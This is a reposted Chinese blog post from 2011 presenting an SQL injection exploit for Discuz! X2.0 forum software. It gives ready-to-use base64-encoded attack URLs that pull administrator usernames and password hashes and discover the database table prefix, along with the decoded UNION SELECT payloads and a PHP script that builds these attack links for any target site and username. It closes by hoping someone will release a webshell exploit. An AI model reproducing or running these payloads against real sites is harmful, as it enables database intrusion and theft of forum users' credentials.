王健宇's BLOG

Discuz! X2.0 SQL注入漏洞 EXP

2011-6-30 王健宇 转载

DZ2.0直接暴管理账号密码（默认前缀的情况下）

http://xxx/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

base64解码

1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like ‘admin|x|y

如果不是默认前缀
暴前缀EXP

http://xxx/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

再贴个PHP的EXP
 <?php
 $host=”http://X2.0论坛地址”;
 $affuser=”要爆的用户名username”;
 echo ‘<a href=”‘;
 echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
 echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|y”));
 echo ‘” target=”_blank”>爆前缀</a>’;
 echo “</br>”;
 echo ‘<a href=”‘;
 echo $host.”forum.php?mod=attachment&findpost=ss&aid=”;
 echo urlencode(base64_encode(“1′ and 1=2 union all select 1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username like ‘$affuser|x|y”));
 echo ‘” target=”_blank”>爆password,salt</a>’;
 ?>

=======================================================

注:即使爆出来用户名与密码，但是密码的加密方式这 MD5(MD5($pass),$salt) 类型，$salt 是 A~z 0~9 随机数值，所以也很鸡肋的，破解不了密码。。。坐等大N出GetwebShell

=======================================================

标签: Discuz! X2.0 0day DZ2.0 0day Discuz! X2.0 exp DZ2.0 exp

评论：